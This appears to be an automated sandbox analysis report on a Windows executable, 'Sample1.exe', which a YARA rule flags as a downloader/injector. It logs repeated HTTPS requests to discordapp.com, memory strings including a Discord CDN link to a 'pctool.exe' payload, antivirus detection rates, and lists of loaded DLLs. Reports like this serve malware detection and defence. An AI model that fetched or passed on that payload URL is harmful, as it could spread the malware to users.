        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:12 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=17pMnJuZ.6ryANGF8z2CN1O1I9Gjw1_rLbRUFAJwWWA-1736950872-1.0.1.1-X7dJwzM9.IEixDuXu1uH_Pq_PdkAn5zQuI9ETZp.ubqsu6m.o0V1M51NdmPzokoKjC_kx1sQ8Py6lUDtLuFwsA; path=/; expires=Wed, 15-Jan-25 14:51:12 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M4XlyDN%2BI4OF6QIP3ByA7wN1MJtYq%2F3uahit77ykINdFt1as8hnN1YL9WC5fi6IgbGZYG2DgrmMRdb%2BD83I%2ByRbqNRNjV2GwE%2F9BBR0J7BZOn81LddhHXtuPadNL6JHBDevaOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=PzAvIVbuKdyGYphTd6qDkPwGW7YPf8_8ycZcqnvtv7Y-1736950872144-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902682c6ba774387-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:17 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=7itytyZjeje8HH5NJEDLC2hGsbclLJgfp1PjhnhCQF8-1736950877-1.0.1.1-jIKdIZp6erbnYvpnbUcXeAxUXA6u0Uwmi0WzuFif2LjCjknVy2ce5m5joUifmEHTumdRphUP2hmuI8VWQBA0.Q; path=/; expires=Wed, 15-Jan-25 14:51:17 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qY9N6tDOohDUYGt%2Bi%2FnRC82BYZh1nuFk4YgKvemyweVHoR7up9UT9jQqtKaq7XqG4sqrhvYLkYoHvwNSnU5GBNQuYgZL03nOehWIAzqkzz%2BNSrsidSIu6RS%2Fj%2BVfCbHNJ35XaQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=njwbFFCxR0Q684HQPXN1uyB2gNhkRIqlQnkgntvTemQ-1736950877791-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902682ea1ecb7283-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:23 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=JHazBZRvc9UqMmFCRR_tAHcuo1nVcbOsIw.hQbivLw4-1736950883-1.0.1.1-cPSkozvbvEexP1mvxROP2GicRRLZqJ9uUr.JibBxLccQvnoZLY_dKWC96GcyeIaW7a._5elMe.JuX7iGmZ1QQg; path=/; expires=Wed, 15-Jan-25 14:51:23 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMG0kIN61GS9QYB4B%2FPFxvNm1k14L6yuTNvy1Sd7VNBBHsDMLhk8wP56jDnFlF2FvfH22Z3g0NKxaJmel4HgY%2FqJe9vbnZmsli3yUMmxpjxjKqmu7VnjkicW0Q2Wba%2BcEsYX%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=N7C0Syy_nx2pHdZN1tf9HcDl7jxC7hQnMZY_U6EMVfA-1736950883394-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026830d2c09de92-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:29 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=grTr6ttAHBPGQ8Q2S1DHkZ2VC59011qNmpcfmQ5W1pQ-1736950889-1.0.1.1-me6Dos9HqCc_6TG43g74XBkMHuA65F9J.x2SwmzL_mLmk8t11umiFiojFwcSUpOQljZnCHOK.yszbkJ_S.MIKQ; path=/; expires=Wed, 15-Jan-25 14:51:29 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CevIaFoHDm2hv8ycdC6lfCzubEqJSooCubJU%2Be2I06vbA4EFq7WorvkL9qCvqoAGaKPeP7Z9qpQuZH%2FPI87rNewTBqPJCFHjpmf3Dq7GQjWtcR4ZdVwi2tB1XhBSADKGoH7Yw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=5W3Nw3iktPYLD1hnq4YUkLt_QKCzatIM.GQ66QFrdwc-1736950889040-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902683306fcb41fe-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:34 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=jYqDV_dHoqnJASbWyURgwLPNRh4uGD33YQah.5JPZww-1736950894-1.0.1.1-3ar16d7mzQbFy6PTY9jRr9vJim1yEx_U95C4LpMIY0j4SZTjjFfScwtpJEmkzQAPLd4qWjTosugpMnP5oogMFQ; path=/; expires=Wed, 15-Jan-25 14:51:34 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0RTkPsyq7%2F9TzT3lcBzbzfSRvDBQrQgSnDn5xrLP55bwJjAzNEWyJgoJ6NVCm9alU359FgEUBy7o0PqpY1FlcVBeyqiYRaD3i9CnCNnTEx85k9EqlGNR3Odja85BXNZCBEjHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=GLeQt8XglSih9oznmL3CLCEqf12qzEHHApCOcawuAik-1736950894660-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026835378404309-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:40 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=73UYw9EvSsc0a0M.WRnP44BmdzmqvBDTB9jERmKfMXw-1736950900-1.0.1.1-yU42jYrPUnmKi_.eIAEBxvAU1cm7InZ5Kd.jbRE0NpNZLn4gmAg5qjw7FDhe_O_p7PJA7nT..N5OWB900vzxKw; path=/; expires=Wed, 15-Jan-25 14:51:40 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kx55dVHyVHm86W48OxbSOfL2IAZ3OSNy7jAUTDek%2BSrJ4yxQTniQAOhD81EY9z6zUBEjLkU0pyC5OWm%2BHB0RaWaaunyMzmqddegCUBJd6zypxdFDfKl0n6YBi0MUKDR2uLBY8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=BulpUiyvq9AK99Qc4rJK71wKI_NoYU8EplBOFqW_dws-1736950900297-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90268376bf624307-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:45 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=or_KP0offYnOYYkYmqUaug5xUScRQSaiPGZeq88BmBQ-1736950905-1.0.1.1-Cqtnmaoqjd.nmvtWa9BMgHU2vhwlWVXOjA4GsjxB9CKfCs0ELg5p9J7.S8QYYKb99oH0AsrcXccU7GxWLFsgcQ; path=/; expires=Wed, 15-Jan-25 14:51:45 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KFTxLl0lTUFV1i6Bnh0tdynF3MhEak7RuzAY5Cb4VVnqA3V2pimOcJxfqXY2HwCWjXC3Hn3cBAC8V5BAQwLcIQ5m3WYEu9k4tnFWdgn9zHcAjJcyHkGCtQg5Siaxxb%2F7jXclnQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=I3LHV65WWujpF6Ec_yl_rVGqNqq1MSpYu3XhWcRvyHY-1736950905962-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026839a1afa7c78-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:51 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=5Xh5vgxf_PxXeis0IHG7Ur.rV_K4Bcz5HTXLcXbskqA-1736950911-1.0.1.1-oylfIZKfgoAPvZeQ6iBkwy8b_jcEP8WwTCYiH7TaWVC5ba2lfBgR.AEOfjnzsY5dVOtbXmMiyGRo3DXpOz6fQA; path=/; expires=Wed, 15-Jan-25 14:51:51 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StAGdgw89weyV1wmXhoWJcsidLqZrPf%2FKqao8kFAkiu9MdLKIGdG817SM0DKCCZUMn9op58htEidnTcQFEXorDj1eX%2BURxsg2BM04PuyJLEq9x9M5tYYGbjnvcSoJKeo4GgXfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=p0uvFfcKNyiNygzwFm1C9WSg2KTIV7YLEgd0tZ.mYsk-1736950911587-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902683bd5831c35d-EWRalt-svc: h3=":443"; ma=86400
        Source: Sample1.exe, 00000000.00000002.3195973420.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002D29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
        Source: Sample1.exe, 00000000.00000002.3198337251.000000001BD2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Sample1.exe, 00000000.00000002.3198337251.000000001BD2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftm
        Source: Sample1.exe, 00000000.00000002.3195973420.0000000002D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Sample1.exe, 00000000.00000002.3195973420.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
        Source: Sample1.exeString found in binary or memory: https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.25:49724 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Sample1.exe, type: SAMPLEMatched rule: Detects downloader / injector Author: ditekSHen
        Source: Sample1.exe, 00000000.00000002.3194048765.0000000000B54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Sample1.exe
        Source: Sample1.exe, 00000000.00000000.1322896045.0000000000752000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepctool.exe4 vs Sample1.exe
        Source: Sample1.exeBinary or memory string: OriginalFilenamepctool.exe4 vs Sample1.exe
        Source: Sample1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: Sample1.exe, type: SAMPLEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
        Source: classification engineClassification label: mal84.troj.evad.winEXE@2/0@3/1
        Source: C:\Users\user\Desktop\Sample1.exeMutant created: NULL
        Source: Sample1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Sample1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\Sample1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Sample1.exeVirustotal: Detection: 83%
        Source: Sample1.exeReversingLabs: Detection: 81%
        Source: unknownProcess created: C:\Users\user\Desktop\Sample1.exe "C:\Users\user\Desktop\Sample1.exe"
        Source: unknownProcess created: C:\Windows\System32\SystemSettingsBroker.exe C:\Windows\System32\SystemSettingsBroker.exe -Embedding
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: vcruntime140_1_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: systemsettings.datamodel.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: settingshandlers_display.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: cfgmgr32.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: deviceassociation.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: settingshandlers_accessibility.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.internal.accessibility.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.internal.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.cloudstore.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: usermgrcli.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: settingshandlers_sharedexperiences_rome.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: settingshandlers_devices.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: wincorlib.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: appextension.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.devices.radios.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.staterepositorycore.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: audiohandlers.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: mmdevapi.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: uvcmodel.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: audioses.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.media.devices.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: mrmcorer.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.ui.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: languageoverlayutil.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: bcp47mrm.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: deviceflows.datamodel.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: threadpoolwinrt.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: devdispitemprovider.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: devicedisplaystatusmanager.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: fundisc.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: fddevquery.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.graphics.dllJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B488CB7E-98BC-4FA9-9FCA-E461728EFDCE}\InProcServer32Jump to behavior
        Source: Sample1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: Sample1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
